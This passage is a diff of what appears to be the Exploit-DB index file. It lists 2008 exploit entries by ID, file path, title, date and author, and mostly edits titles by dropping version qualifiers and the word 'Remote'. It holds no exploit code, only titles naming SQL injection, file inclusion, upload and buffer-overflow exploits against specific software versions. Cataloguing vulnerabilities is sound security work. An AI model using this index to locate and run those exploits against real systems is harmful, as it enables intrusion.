Inclusion",2008-09-25,dun,php,webapps,0 +6563,platforms/php/webapps/6563.txt,"phpOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0 +6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta (task) Local File Inclusion",2008-09-25,dun,php,webapps,0 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer DoS PoC",2008-09-25,Aodrulez,windows,dos,0 6566,platforms/php/webapps/6566.txt,"php infoboard 7 plus - Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0 -6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager <= 1.18/2.0 - Local File Inclusion Exploit",2008-09-25,Pepelux,php,webapps,0 +6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion Exploit",2008-09-25,Pepelux,php,webapps,0 6568,platforms/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps,0 -6569,platforms/php/webapps/6569.txt,"Vikingboard <= 0.2 Beta SQL Column Truncation",2008-09-25,StAkeR,php,webapps,0 +6569,platforms/php/webapps/6569.txt,"Vikingboard 0.2 Beta SQL Column Truncation",2008-09-25,StAkeR,php,webapps,0 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 -6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,php,webapps,0 +6571,platforms/php/webapps/6571.txt,"openengine 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,php,webapps,0 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0 -6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 +6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL (go.php id) Remote SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL (go.php id) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6578,platforms/php/webapps/6578.txt,"212cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager <= 1.18 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 +6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service Exploit",2008-09-26,"Julien Bedard",windows,dos,0 6582,platforms/hardware/dos/6582.pl,"Windows Mobile 6.0 Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 -6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project <= 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 -6584,platforms/php/webapps/6584.txt,"The Gemini Portal <= 4.7 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 +6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 +6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 -6586,platforms/php/webapps/6586.txt,"Crux Gallery <= 1.32 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 +6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion Vulnerabilities",2008-09-26,ZoRLu,php,webapps,0 6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 -6589,platforms/php/webapps/6589.txt,"RPG.Board <= 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 -6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) Remote SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 -6591,platforms/php/webapps/6591.txt,"RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 -6592,platforms/php/webapps/6592.txt,"X7 Chat <= 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0 -6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - Remote SQL Injection",2008-09-27,elusiven,php,webapps,0 +6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 +6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 +6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 +6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0 +6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0 6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0 -6595,platforms/php/webapps/6595.txt,"Joovili <= 3.0 - Multiple SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 -6596,platforms/php/webapps/6596.txt,"E-Uploader Pro <= 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 +6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 +6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 -6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) Remote SQL Injection",2008-09-27,CraCkEr,php,webapps,0 +6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) SQL Injection",2008-09-27,CraCkEr,php,webapps,0 6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0 -6601,platforms/php/webapps/6601.txt,"LnBlog <= 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0 +6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0 6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0 -6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) Remote SQL Injection",2008-09-27,r45c4l,php,webapps,0 +6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0 6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - (path) Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 -6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) Remote SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 -6606,platforms/php/webapps/6606.txt,"Yoxel <= 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0 -6607,platforms/php/webapps/6607.txt,"X7 Chat <= 2.0.1A1 - Local File Inclusion (original find)",2008-09-27,JIKO,php,webapps,0 +6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 +6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0 +6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion (original find)",2008-09-27,JIKO,php,webapps,0 6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 Window Object Suppressing DoS Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 -6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS (Search) Remote SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 -6611,platforms/php/webapps/6611.php,"PHPcounter <= 1.3.2 - (index.php name) Remote SQL Injection Exploit",2008-09-28,StAkeR,php,webapps,0 +6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS (Search) SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 +6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - (index.php name) SQL Injection Exploit",2008-09-28,StAkeR,php,webapps,0 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection Vulnerabilities",2008-09-28,~!Dok_tOR!~,php,webapps,0 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining (news_read.php id) SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - (.zip) Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 -6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 +6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 -6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) Remote SQL Injection",2008-09-28,boom3rang,php,webapps,0 +6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - (linkid) SQL Injection",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 6623,platforms/php/webapps/6623.txt,"events calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 -6624,platforms/php/webapps/6624.txt,"Arcadem Pro (articlecat) Remote SQL Injection",2008-09-29,"Hussin X",php,webapps,0 +6624,platforms/php/webapps/6624.txt,"Arcadem Pro (articlecat) SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script Multiple SQL Injection Vulnerabilities",2008-09-29,"Super Cristal",php,webapps,0 6628,platforms/php/webapps/6628.txt,"ArabCMS - (rss.php rss) Local File Inclusion",2008-09-29,JIKO,php,webapps,0 -6629,platforms/php/webapps/6629.txt,"FAQ Management Script (catid) Remote SQL Injection",2008-09-30,"Hussin X",php,webapps,0 +6629,platforms/php/webapps/6629.txt,"FAQ Management Script (catid) SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit",2008-09-30,Nine:Situations:Group,windows,remote,0 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection/Local File Inclusion Vulnerabilities",2008-09-30,SirGod,php,webapps,0 6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0 -6633,platforms/php/webapps/6633.txt,"eFront <= 3.5.1 / build 2710 - Remote Arbitrary Upload",2008-09-30,Pepelux,php,webapps,0 +6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Remote Arbitrary Upload",2008-09-30,Pepelux,php,webapps,0 6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection Exploit",2008-09-30,Stack,php,webapps,0 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Remote Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - (view_group.php id) SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6638,platforms/windows/remote/6638.html,"GdPicture Pro ActiveX - (gdpicture4s.ocx) File Overwrite / Exec Exploit",2008-09-30,EgiX,windows,remote,0 -6639,platforms/php/webapps/6639.txt,"Pritlog <= 0.4 - (filename) Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 -6640,platforms/php/webapps/6640.pl,"ADN Forum <= 1.0b - BlindSQL Injection Exploit",2008-10-01,StAkeR,php,webapps,0 -6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin <= 1.5.5 - (COOKIE) Local File Inclusion",2008-10-01,JosS,php,webapps,0 -6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) Remote SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 +6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - (filename) Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 +6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - BlindSQL Injection Exploit",2008-10-01,StAkeR,php,webapps,0 +6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - (COOKIE) Local File Inclusion",2008-10-01,JosS,php,webapps,0 +6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 -6645,platforms/php/webapps/6645.txt,"Crux Gallery <= 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 -6646,platforms/php/webapps/6646.php,"phpScheduleIt <= 1.2.10 - (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 +6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 +6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 6647,platforms/windows/dos/6647.c,"ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit",2008-10-01,"NT Internals",windows,dos,0 6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 -6650,platforms/php/webapps/6650.txt,"Link Trader (ratelink.php lnkid) Remote SQL Injection",2008-10-01,"Hussin X",php,webapps,0 +6650,platforms/php/webapps/6650.txt,"Link Trader (ratelink.php lnkid) SQL Injection",2008-10-01,"Hussin X",php,webapps,0 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC",2008-10-02,"Julien Bedard",windows,dos,0 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 -6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 +6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x - (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection",2008-10-03,"Hussin X",php,webapps,0 -6660,platforms/windows/dos/6660.txt,"Serv-U <= 7.3 - (stou con:1) Denial of Service (Auth)",2008-10-03,dmnt,windows,dos,0 -6661,platforms/windows/remote/6661.txt,"Serv-U <= 7.3 - Remote FTP File Replacement (Auth)",2008-10-03,dmnt,windows,remote,0 -6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite <= 1.3 - Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 +6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (stou con:1) Denial of Service (Auth)",2008-10-03,dmnt,windows,dos,0 +6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Remote FTP File Replacement (Auth)",2008-10-03,dmnt,windows,remote,0 +6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion Vulnerabilities",2008-10-03,SirGod,php,webapps,0 -6664,platforms/php/webapps/6664.txt,"Kwalbum <= 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 +6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0 6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - (notes.php id) Local File Inclusion",2008-10-04,JosS,php,webapps,0 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0 6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion Vulnerabilities",2008-10-04,SirGod,php,webapps,0 -6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin <= 1.0 - Remote Arbitrary Upload Exploit",2008-10-04,Pepelux,php,webapps,0 +6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Remote Arbitrary Upload Exploit",2008-10-04,Pepelux,php,webapps,0 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 -6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 - Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 +6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection Exploit",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 -6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) Remote SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 +6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"fastpublish CMS 1.9999 - (LFI/SQL) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 -6679,platforms/php/webapps/6679.txt,"phpAbook <= 0.8.8b (COOKIE) Local File Inclusion",2008-10-05,JosS,php,webapps,0 -6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public <= 1.0 - Arbitrary File Upload Vulnerabilities",2008-10-05,Pepelux,php,webapps,0 -6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals (manual) Remote SQL Injection",2008-10-05,boom3rang,php,webapps,0 +6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b (COOKIE) Local File Inclusion",2008-10-05,JosS,php,webapps,0 +6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload Vulnerabilities",2008-10-05,Pepelux,php,webapps,0 +6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals (manual) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept (kat_id) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - (raceid) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion Vulnerabilities",2008-10-06,NoGe,php,webapps,0 6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote,0 -6687,platforms/php/webapps/6687.pl,"Yerba SACphp <= 6.3 - (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 +6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing",2008-10-07,irk4z,windows,remote,0 -6691,platforms/php/webapps/6691.txt,"yerba sacphp <= 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 -6692,platforms/php/webapps/6692.txt,"Joomla Component com_hotspots (w) Remote SQL Injection",2008-10-07,cOndemned,php,webapps,0 -6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 - (COOKIE) Remote SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 -6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) Remote SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 +6691,platforms/php/webapps/6691.txt,"yerba sacphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 +6692,platforms/php/webapps/6692.txt,"Joomla Component com_hotspots (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0 +6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 - (COOKIE) SQL Injection",2008-10-07,Tec-n0x,php,webapps,0 +6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP RealEstate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0 -6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic <= 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 +6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher ActiveX Cross-Site File Upload Attack PoC",2008-10-08,Nine:Situations:Group,windows,remote,0 -6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - RFI Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 -6701,platforms/php/webapps/6701.txt,"HispaH textlinksads (index.php) Remote SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 +6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 +6701,platforms/php/webapps/6701.txt,"HispaH textlinksads (index.php) SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 -6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller <= 1.1 - (RFI/RFD) Remote Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 +6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - (RFI/RFD) Remote Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0 -6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (1)",2008-10-09,Sausage,php,webapps,0 -6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 - Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 -6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 -6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 - Remote SQL Injection",2008-10-09,rsauron,php,webapps,0 +6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution Exploit (1)",2008-10-09,Sausage,php,webapps,0 +6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 +6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 +6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0 6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 - (SQL/XSS) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 -6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0 +6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center (news.php id) SQL Injection",2008-10-09,"Hussin X",php,webapps,0 